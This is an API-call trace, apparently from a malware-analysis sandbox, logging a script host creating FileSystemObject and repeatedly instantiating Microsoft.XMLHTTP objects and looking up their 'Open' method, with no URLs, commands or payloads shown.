	[0779.495] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0779.499] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0779.499] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0779.499] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0779.499] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0779.499] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0779.499] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0783.309] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0783.309] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0783.310] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0783.314] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0783.314] SysStringLen (param_1=0x0) returned 0x0
	[0783.314] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0783.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0783.314] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0783.314] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0783.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0783.314] ??2@YAPEAX_K@Z () returned 0x62f310
	[0783.315] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0783.315] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0783.315] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0783.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0783.315] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0783.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0783.315] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0783.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0783.318] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0783.318] SysStringLen (param_1=0x0) returned 0x0
	[0783.318] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0783.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0783.318] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0783.318] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0783.318] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0783.319] ??2@YAPEAX_K@Z () returned 0x62f330
	[0783.319] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f330) 
	[0783.319] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0783.319] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0783.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0783.319] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0783.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0783.319] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0783.319] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0783.319] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0783.319] SysStringLen (param_1=0x0) returned 0x0
	[0783.320] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0783.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0783.320] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0783.320] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0783.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0783.320] ??2@YAPEAX_K@Z () returned 0x62f310
	[0783.320] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0783.320] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0783.320] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0783.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0783.320] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0783.320] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0783.321] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0783.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0783.321] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0783.321] SysStringLen (param_1=0x0) returned 0x0
	[0783.321] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0783.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0783.321] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0783.321] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0783.321] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0783.321] ??2@YAPEAX_K@Z () returned 0x62f330
	[0783.321] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0783.321] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0783.321] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0783.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0783.322] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0783.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0783.322] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0783.322] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0783.322] longjmp () 
	[0783.322] longjmp () 
	[0783.322] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0783.322] SysStringLen (param_1=0x0) returned 0x0
	[0783.322] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0783.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0783.323] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0783.323] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0783.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0783.323] ??2@YAPEAX_K@Z () returned 0x62f310
	[0783.323] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0783.323] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0783.323] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0783.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0783.323] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0783.323] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0783.323] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0783.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0783.324] longjmp () 
	[0783.324] longjmp () 
	[0783.324] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0783.324] SysStringLen (param_1=0x0) returned 0x0
	[0783.324] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0783.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0783.324] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0783.324] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0783.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0783.325] ??2@YAPEAX_K@Z () returned 0x62f330
	[0783.325] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
